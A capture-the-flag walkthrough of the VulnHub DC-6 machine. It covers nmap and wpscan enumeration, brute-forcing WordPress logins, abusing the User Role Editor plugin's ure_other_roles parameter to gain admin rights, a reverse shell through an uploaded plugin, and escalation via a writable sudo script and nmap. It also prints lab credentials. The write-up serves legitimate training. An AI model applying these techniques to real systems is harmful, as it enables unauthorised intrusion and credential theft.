Walkthrough of DC-6 challenge from vulnhub. Initial hints given from reviewing the challenge listing:
- The name of the host is wordy
- A password list can be determined using cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
A basic ping sweep finds the machine, throwing a default nmap scan at it finds two ports of interest – SSH (22) & HTTP (80). Of interest in the http headers are the mention of hostname wordy (inline with the initial hint)
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA) | 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA) |_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Did not follow redirect to http://wordy/ MAC Address: 00:0C:29:C3:AD:DB (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9
Wordy added to the /etc/hosts file & off to have a look at the website
A quick browse through the website shows it to be a fairly basic WordPress site. Checking it with wpscan reveals a few things of use.
root@kali:/var/www/html# wpscan --url http://wordy _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 2.9.4 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_ _______________________________________________________________ [+] URL: http://wordy/ [+] Started: Tue May 14 20:30:56 2019 [+] Interesting header: LINK: <http://wordy/index.php/wp-json/>; rel="https://api.w.org/" [+] Interesting header: LINK: <http://wordy/>; rel=shortlink [+] Interesting header: SERVER: Apache/2.4.25 (Debian) [+] XML-RPC Interface available under: http://wordy/xmlrpc.php [HTTP 405] [+] Found an RSS Feed: http://wordy/index.php/feed/ [HTTP 200] [!] Detected 1 user from RSS feed: +-------+ | Name | +-------+ | admin | +-------+ [!] Includes directory has directory listing enabled: http://wordy/wp-includes/ [+] Enumerating WordPress version ... [+] WordPress version 5.1.1 (Released on 2019-03-13) identified from meta generator, links opml [+] WordPress theme in use: twentyseventeen - v2.1 [+] Name: twentyseventeen - v2.1 | Last updated: 2019-05-07T00:00:00.000Z | Location: http://wordy/wp-content/themes/twentyseventeen/ | Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt [!] The version is out of date, the latest version is 2.2 | Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css | Theme Name: Twenty Seventeen | Theme URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a... | Author: the WordPress team | Author URI: https://wordpress.org/ [+] Enumerating plugins from passive detection ... [+] No plugins found passively
From looking at the initial output no obvious vulnerabilities are identified. Its a reasonably recent WordPress install with no detected plugins. As a next step brute force of the user accounts is attempted (command: wpscan –url http://wordy/ –wordlist /root/Documents/DC-6/passwords.txt) the login using the password list created from the hints.
[+] Enumerating usernames ... [+] We identified the following 5 users: +----+--------+-----------------+ | ID | Login | Name | +----+--------+-----------------+ | 1 | admin | admin | | 2 | graham | Graham Bond | | 3 | mark | Mark Jones | | 4 | sarah | Sarah Balin | | 5 | jens | Jens Dagmeister | +----+--------+-----------------+ [!] Default first WordPress username 'admin' is still used [+] Starting the password brute forcer Brute Forcing 'admin' Time: 00:00:50 <== > (2668 / 2669) 99.96% ETA: 00:00:00 Brute Forcing 'graham' Time: 00:00:39 <= > (2668 / 2669) 99.96% ETA: 00:00:00 [+] [SUCCESS] Login : mark Password : helpdesk01 Brute Forcing 'sarah' Time: 00:00:40 <== > (2666 / 2669) 99.88% ETA: 00:00:00 Brute Forcing 'jens' Time: 00:00:46 <=== > (2663 / 2669) 99.77% ETA: 00:00:00 +----+--------+-----------------+------------+ | ID | Login | Name | Password | +----+--------+-----------------+------------+ | 1 | admin | admin | | | 2 | graham | Graham Bond | | | 3 | mark | Mark Jones | helpdesk01 | | 4 | sarah | Sarah Balin | | | 5 | jens | Jens Dagmeister | | +----+--------+-----------------+------------+
Credentials for user mark successfully identified. Logging into the site finds user mark has a limited set of privileges. Reviewing the install shows a few plugins installed that the wpscan failed to pick up. One of interest is user role editor version 4.24. Researching the plugin version shows a low privilege user can exploit the plug to gain admin credentials – https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/.
Reviewing the sample exploit code at https://www.exploit-db.com/exploits/44595 & https://packetstormsecurity.com/files/147515/WordPress-User-Role-Editor-Plugin-Privilege-Escalation.html shows that HTTP POST parameter ure_other_roles=[“role1”, “role2”] can be added to a user update request to grant additional privileges role1 & role2 to the logged in user.
Target to get a low privilege shell on the box is via a custom malicious WordPress Plugin. To do this the logged in user needs to be able to upload and active new plugins. A review of https://codex.wordpress.org/Roles_and_Capabilities suggests the additional roles needed are:
Profile update request sent with additional privileges added now lets our user upload plugins.
Loading the malicious plugin and activating it gives us a low privilege shell on the machine.
root@kali-2018:~/Documents/DC-6# nc -lvp 5556 listening on [any] 5556 ... connect to [192.168.139.131] from wordy [192.168.139.134] 38870 Linux dc-6 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux 21:13:15 up 1:28, 0 users, load average: 0.01, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami whoami www-data $ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ uname uname Linux $ uname -a uname -a Linux dc-6 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux $ cat /etc/issue cat /etc/issue Debian GNU/Linux 9 \n \l
Browsing through the machine the following file of interest is identified.
$ cat things-to-do.txt cat things-to-do.txt Things to do: - Restore full functionality for the hyperdrive (need to speak to Jens) - Buy present for Sarah's farewell party - Add new user: graham - GSo7isUM1D4 - done - Apply for the OSCP course - Buy new laptop for Sarah's replacement
SSH into the box into the box using the username and password succeeds, now onto escalating privileges and the root flag.
Initial enumeration work as user graham identifies the following items of interest.
- User graham can run the command /home/jens/backup.sh as user jens via sudo with no password.
- User graham is in the devs group and can write to file /home/jens/backup.sh
graham@dc-6:~$ sudo -l Matching Defaults entries for graham on dc-6: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User graham may run the following commands on dc-6: (jens) NOPASSWD: /home/jens/backups.sh graham@dc-6:~$ ls -al /home/jens/backups.sh -rwxrwxr-x 1 jens devs 50 Apr 26 02:19 /home/jens/backups.sh graham@dc-6:~$ id uid=1001(graham) gid=1001(graham) groups=1001(graham),1005(devs)
This arrangement is dangerous – it allows one user (graham) to execute any command as another user (jens). Let’s do that.
Swapping out the contents of /home/jens/backups.sh with bin/bash and running it swaps us over to user jens. From there it’s confirmed user jens can run nmap as root with no password. This can be used to spawn a root shell (review https://gtfobins.github.io/gtfobins/nmap/ for how)
Root flag obtained .
From enumerating the machine the following post-exploitation items of interest were identified. When attempting to crack hashes https://hashcat.net/wiki/doku.php?id=example_hashes is useful identify the type of hash.
#1 – Mysql database credentials:
define( 'DB_NAME', 'wordpressdb' ); /** MySQL database username */ define( 'DB_USER', 'wpdbuser' ); /** MySQL database password */ define( 'DB_PASSWORD', 'meErKatZ' );
#2 – WordPress password hashes. These were extracted using the credentials found at step # 1.
Running hashcat against the list so far only recovers the user password for mark (helpdesk01).